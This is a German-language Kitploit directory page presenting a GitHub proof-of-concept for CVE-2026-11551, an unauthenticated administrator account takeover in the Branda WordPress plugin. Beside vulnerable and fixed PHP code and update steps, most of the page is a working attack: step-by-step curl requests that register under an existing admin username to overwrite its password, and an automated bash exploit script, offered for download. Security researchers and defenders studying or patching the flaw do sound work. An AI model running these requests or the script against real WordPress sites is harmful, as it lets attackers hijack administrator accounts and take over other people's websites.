Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
By-Poloss..-..CVE-2026-11551-PoC — Nicht authentifizierte Rechteausweitung durch Kontoübernahme | Kitploit
Tools/GitHubGitHub/polosss/by-poloss..-..cve-2026-11551-poc
Privilege EscalationPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubpolosss/by-poloss..-..cve-2026-11551-poc

By-Poloss..-..CVE-2026-11551-PoC

Nicht authentifizierte Rechteausweitung durch Kontoübernahme

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
144vor 2 MonatenNoch nicht geprüft

CVE-2026-11551: Branda Plugin – Nicht authentifizierte Privilegienerweiterung durch Account-Übernahme

Übersicht

  • CVE-ID: CVE-2026-11551
  • CVSS-Score: 9.8 (Kritisch)
  • Betroffen: Branda – White Label & Branding <= 3.4.29
  • Behoben: 3.4.31
  • Veröffentlicht: 19. Juni 2026

Beschreibung der Schwachstelle

Das Branda-Plugin für WordPress ist in allen Versionen bis einschließlich 3.4.29 anfällig für eine Privilegienerweiterung durch Account-Übernahme. Grund dafür ist, dass das Plugin die Identität eines Benutzers vor der Aktualisierung seines Passworts nicht ordnungsgemäß validiert. Dadurch ist es nicht authentifizierten Angreifern möglich, die Passwörter beliebiger Benutzer zu ändern, einschließlich der von Administratoren, und so Zugriff auf deren Konten zu erlangen.

Technische Analyse

Verwundbare Codestelle

/inc/modules/login-screen/signup-password.php

Grundursache

Die Funktion pre_insert_user_data() in der verwundbaren Version enthält keine ordnungsgemäße Validierung:

root@kitploit:~
// Vulnerable version (3.4.29)
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite code...
    }
    // Missing: if ($update) return $data; <-- VULNERABILITY
    
    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        // Set the password from POST data
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Behobener Code (3.4.31)

root@kitploit:~
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite code with proper checks...
    }

    // FIX: Added check to prevent updating existing users
    if ( $update ) {
        return $data;
    }

    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Angriffsvektoren

Vektor 1: Multisite-Registrierung (primär)

  1. Der Angreifer ruft /wp-signup.php auf
  2. Registriert sich mit einem vorhandenen Admin-Benutzernamen (z. B. „admin“)
  3. Setzt ein eigenes Passwort über den Parameter password_1
  4. Branda speichert das Passwort in den Signup-Metadaten
  5. Bei der Aktivierung überschreibt das Passwort das Passwort des vorhandenen Administrators

Vektor 2: Registrierung auf Einzelseite

  1. Der Angreifer ruft /wp-login.php?action=register auf
  2. Branda fügt dem Formular Passwortfelder hinzu
  3. Der Angreifer übermittelt die Registrierung mit einem vorhandenen Benutzernamen
  4. Ist die Aktivierung abgeschlossen, wird das Passwort gesetzt

Proof-of-Concept (curl)

Schritt 1: Prüfen, ob die Registrierung aktiviert ist

root@kitploit:~
curl -s -k "https://TARGET/wp-login.php?action=register" | grep -i "registration"

Schritt 2: WordPress-Typ prüfen (Multisite vs. Einzelseite)

root@kitploit:~
curl -s -k -I "https://TARGET/wp-signup.php" | grep "HTTP/"

Schritt 3: Für Multisite – Mit Admin-Benutzernamen registrieren

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-signup.php" \
  -d "user_name=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "signup_for=blog"

Schritt 4: Für Einzelseite – Registrieren

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php?action=register" \
  -d "user_login=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "wp-submit=Register"

Schritt 5: Aktivieren (falls E-Mail-Verifizierung erforderlich)

root@kitploit:~
# Extract activation key from email and visit:
curl -s -k -c cookies.txt -b cookies.txt \
  "https://TARGET/wp-activate.php?key=ACTIVATION_KEY"

Schritt 6: Verifizieren – Login versuchen

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php" \
  -d "log=admin" \
  -d "pwd=NewP@ssw0rd!" \
  -d "wp-submit=Log In" \
  -L | grep -i "dashboard\|wp-admin\|error"

Automatisiertes Exploit-Skript

root@kitploit:~
#!/bin/bash
TARGET="https://TARGET"
USERNAME="admin"
NEW_PASSWORD="Pwned$(date +%s)!"

echo "[*] Registering $USERNAME with password $NEW_PASSWORD..."

# Multisite attack
curl -s -k -c /tmp/cookies.txt \
  -X POST "$TARGET/wp-signup.php" \
  -d "user_name=$USERNAME" \
  -d "[email protected]" \
  -d "password_1=$NEW_PASSWORD" \
  -d "password_2=$NEW_PASSWORD"

echo "[*] Check email for activation link"
echo "[*] After activation, try: curl -X POST $TARGET/wp-login.php -d 'log=$USERNAME' -d 'pwd=$NEW_PASSWORD'"

Voraussetzungen für die Ausnutzung

  1. WordPress mit installiertem und aktiviertem Branda-Plugin <= 3.4.29
  2. Die Benutzerregistrierung muss aktiviert sein (prüfen unter Settings > General > Membership: Anyone can register)
  3. Für eine erfolgreiche Account-Übernahme: Der Ziel-Benutzername muss existieren
  4. Für Multisite: Zugriff auf die Aktivierungs-E-Mail (oder Aktivierungs-Bypass)

Behebung

Aktualisieren Sie das Branda-Plugin auf Version 3.4.31 oder neuer:

root@kitploit:~
# Via WordPress Admin
Dashboard > Plugins > Branda > Update

# Via WP-CLI
wp plugin update branda-white-labeling

# Via SSH
wp plugin update branda-white-labeling --version=3.4.31

Auswirkungen

  • Vertraulichkeit: Hoch – Der Angreifer erhält Zugriff auf ein beliebiges Benutzerkonto
  • Integrität: Hoch – Der Angreifer kann Inhalte ändern
  • Verfügbarkeit: Hoch – Der Angreifer kann legitime Benutzer aussperren

Referenzen

  • Wordfence Intelligence
  • WPScan
  • Plugin Trac

W.P.E.F

  • W.P.E.F Telegram-Kanal #1
  • W.P.E.F Telegram-Kanal #2
Tool herunterladen